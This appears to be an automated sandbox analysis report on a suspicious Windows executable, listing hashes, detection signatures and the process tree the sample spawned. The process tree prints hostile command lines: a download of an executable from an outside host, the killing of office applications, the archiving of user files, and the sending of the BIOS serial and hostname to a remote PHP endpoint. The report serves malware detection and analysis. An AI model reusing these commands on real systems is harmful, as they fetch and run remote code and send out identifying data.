Edit tour
Windows
Analysis Report
SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe
Overview
General Information
| Sample name: | SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe |
| Analysis ID: | 1538480 |
| MD5: | 36f1b6a1df5c33a33dba8396c877062d |
| SHA1: | b0bf0049d0f56a60056802ca484d96d28584fe61 |
| SHA256: | 5dfc2387cbc7e73e92ca2d4526a73a812bb61a7d8a6a8f900170dbcffc9394d5 |
| Tags: | exe |
| Infos: |  |
 | |
Detection
| Score: | 76 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Obfuscated command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Yara detected BatToExe compiled binary
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Classification
- System is w10x64
SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe (PID: 6304 cmdline: "C:\Users\ user\Deskt op\Securit eInfo.com. W32.Possib leThreat.1 7916.5400. exe" MD5: 36F1B6A1DF5C33A33DBA8396C877062D) 
conhost.exe (PID: 3060 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3576 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\24C7 .tmp\my_cl eaner2.bat " "C:\User s\user\Des ktop\Secur iteInfo.co m.W32.Poss ibleThreat .17916.540 0.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - ariac.exe (PID: 4536 cmdline:
\Users\use r\TMP\cr-2 0241021-53 901\ariac. exe -l lo g.txt -o c lean.exe h ttp://upjv .info/clea n/clean2.e xe MD5: 53D237CBBDAC5AE3DC65C9EE8A51094D) 
clean.exe (PID: 7124 cmdline: clean.exe -y MD5: A527013DA966D9FD8C16E6BB70937CD2) - taskkill.exe (PID: 6128 cmdline:
taskkill / IM WINWORD .EXE /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 6048 cmdline:
taskkill / IM EXCEL.E XE /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5268 cmdline:
taskkill / IM SOFFICE .BIN /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 2380 cmdline:
ping 127.0 .0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12) - 7z.exe (PID: 5960 cmdline:
\Users\use r\TMP\cr-2 0241021-53 901\clean\ Zip\App\7- Zip\7z.exe a \Users\ user\TMP\c r-20241021 -53901.zip \Users\us er\TMP\cr- 20241021-5 3901 MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) 
WMIC.exe (PID: 5548 cmdline: wmic bios get serial number MD5: E2DE6500DE1148C7F6027AD50AC8B891) - more.com (PID: 2212 cmdline:
more +1 se rialnumber .txt MD5: 03805AE7E8CBC07840108F5C80CF4973) - ariac.exe (PID: 1292 cmdline:
\Users\use r\TMP\cr-2 0241021-53 901\ariac. exe -l lo g2.txt -o result.htm l "http:// upjv.info/ clean/entr ee.php?pos te=user-PC ^&serial=F 2LEUD3EOH" MD5: 53D237CBBDAC5AE3DC65C9EE8A51094D) 
firefox.exe (PID: 1164 cmdline: "C:\Progra m Files\Mo zilla Fire fox\firefo x.exe" "ht tp://upjv. info/clean /clean.php ?serial=F2 LEUD3EOH" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045) - PING.EXE (PID: 7164 cmdline:
ping 127.0 .0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12) - PING.EXE (PID: 5136 cmdline:
ping 127.0 .0.1 -n 42 0 MD5: B3624DD758CCECF93A1226CEF252CA12)
- firefox.exe (PID: 6152 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\firefo x.exe" htt p://upjv.i nfo/clean/ clean.php? serial=F2L EUD3EOH -- attempting -deelevati on MD5: C86B1BE9ED6496FE0E0CBE73F81D8045) - firefox.exe (PID: 1088 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\firefo x.exe" htt p://upjv.i nfo/clean/ clean.php? serial=F2L EUD3EOH MD5: C86B1BE9ED6496FE0E0CBE73F81D8045) - firefox.exe (PID: 5548 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\firefo x.exe" -co ntentproc --channel= 2264 -pare ntBuildID 2023092723 2528 -pref sHandle 22 08 -prefMa pHandle 22 00 -prefsL en 25308 - prefMapSiz e 237879 - win32kLock edDown -ap pDir "C:\P rogram Fil es\Mozilla Firefox\b rowser" - {ee62d03a- b3f3-4839- a2d9-d4629 3892022} 1 088 "\\.\p ipe\gecko- crash-serv er-pipe.10 88" 2434ae 6bb10 sock et MD5: C86B1BE9ED6496FE0E0CBE73F81D8045) - firefox.exe (PID: 7652 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\firefo x.exe" -co ntentproc --channel= 4164 -pare ntBuildID 2023092723 2528 -pref sHandle 46 28 -prefMa pHandle 46 20 -prefsL en 26338 - prefMapSiz e 237879 - appDir "C: \Program F iles\Mozil la Firefox \browser" - {82d645d b-fc8a-46d 4-a6c6-6ec f6ff53d4a} 1088 "\\. \pipe\geck o-crash-se rver-pipe. 1088" 2435 dcb5e10 rd d MD5: C86B1BE9ED6496FE0E0CBE73F81D8045) - firefox.exe (PID: 8184 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\firefo x.exe" -co ntentproc --channel= 5136 -pare ntBuildID 2023092723 2528 -sand boxingKind 0 -prefsH andle 5200 -prefMapH andle 5196 -prefsLen 33119 -pr efMapSize 237879 -wi n32kLocked Down -appD ir "C:\Pro gram Files \Mozilla F irefox\bro wser" - {0 2166d0c-fa 79-4115-8a 80-2fad783 b6113} 108 8 "\\.\pip e\gecko-cr ash-server -pipe.1088 " 2435db1b 910 utilit y MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security | ||
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security | ||
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security | ||
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security | ||
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security | ||
| Click to see the 49 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security | ||
| JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security |
⊘No Sigma rule has matched
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 5_2_00403E37 | |
| Source: | Code function: | 10_2_00C55869 | |
| Source: | Code function: | 10_2_00C575DA | |
| Source: | Code function: | 5_2_0040451D | |
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Memory has grown: | ||
Networking | |
|---|
| Source: | Process created: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTP traffic detected: | ||